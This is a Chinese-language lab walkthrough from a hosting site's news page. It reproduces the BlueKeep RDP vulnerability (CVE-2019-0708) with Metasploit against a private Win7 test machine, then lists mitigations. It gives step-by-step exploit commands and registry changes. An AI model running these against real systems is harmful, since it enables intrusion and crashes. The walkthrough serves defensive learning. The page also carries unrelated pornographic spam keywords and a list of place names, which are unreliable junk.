亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

發布時間:2021-12-28 17:52:20 來源:億速云 閱讀:325 作者:柒染 欄目:安全技術

本篇文章為大家展示了如何分析RDP終極EXP爆破漏洞CVE-2019-0708,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

0x00 漏洞概述

CVE-2019-0708是微軟于2019年05月14日發布的一個嚴重的RDP遠程代碼執行漏洞。該漏洞無需身份認證和用戶交互,可能形成蠕蟲爆發,影響堪比wannycry。

2019年09月07日,@rapid7 在其metasploit-framework倉庫公開發布了CVE-2019-0708的利用模塊,漏洞利用工具已經開始擴散,已經構成了蠕蟲級的攻擊威脅。

0x01 影響版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Windows 8和Windows 10及之后版本的用戶不受此漏洞影響

0x02 漏洞原理

由于對象指針在釋放后再次被使用而引發UAF漏洞,詳情見

https://www.anquanke.com/post/id/181577

0x03 環境搭建

環境準備:

win7 sp1 - 192.168.152.139

Kali 2019.4 - 192.168.152.138

1.win7 sp1 準備:

開啟3389:

打開控制面板,選擇系統和安全,選擇系統,點擊遠程設置,彈出系統屬性,點擊遠程,在遠程桌面上選擇允許運行任意版本遠程桌面的計算機連接(較不安全)。

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

2.Win+r,輸入cmd命令,輸入netstat -ano查看端口狀態,可以看道3389狀態是listening。

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

3.修改注冊表:

Win + R 輸入 regedit 進入注冊表編輯器,按以下目錄找到 fDisableCam 并將值改為0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

4.打開kali :

Kali2019版本的要下載需要的文件

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

可以看到有四個.rb后綴的文件,接下來將它們放至相應的目錄(rdp目錄需要自己創建)

rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd

rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

5.查看文件是否復制成功

cd /usr/share/metasploit-framework/lib/msf/core/exploit/

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

cd /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

cd /usr/share/metasploit-framework/modules/exploit/windows/rdp/

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

0x04漏洞復現

1. 啟動msf:

Msfconsole

2.重新加載所有模塊(重要):

命令:reload_all

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

3.搜索漏洞模塊

search 2019_0708

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻擊模塊

set rhosts 192.168.152.139 //設置目標主機(win7 sp1)

set rport 3389 //設置目標端口

set target 3

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

4.Run 執行 win7 sp1藍屏

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

0x05 漏洞修復

1.及時打對應系統的安全補丁

2.關閉3389端口或添加防火墻安全策略限制對3389端口的訪問

3.打不了補丁的可以開啟遠程桌面(網絡級別身份驗證(NLA)),可以臨時防止漏洞攻擊

上述內容就是如何分析RDP終極EXP爆破漏洞CVE-2019-0708,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

大荔县| 宜城市| 镇康县| 巩留县| 海宁市| 晋中市| 特克斯县| 西贡区| 双城市| 容城县| 霸州市| 崇阳县| 富川| 崇义县| 内丘县| 楚雄市| 徐州市| 花垣县| 前郭尔| 泗阳县| 南岸区| 错那县| 榆社县| 龙江县| 武义县| 都昌县| 石狮市| 西峡县| 芜湖市| 遂川县| 绥棱县| 浦江县| 体育| 沙田区| 安多县| 错那县| 恩平市| 临沂市| 海门市| 合江县| 牙克石市|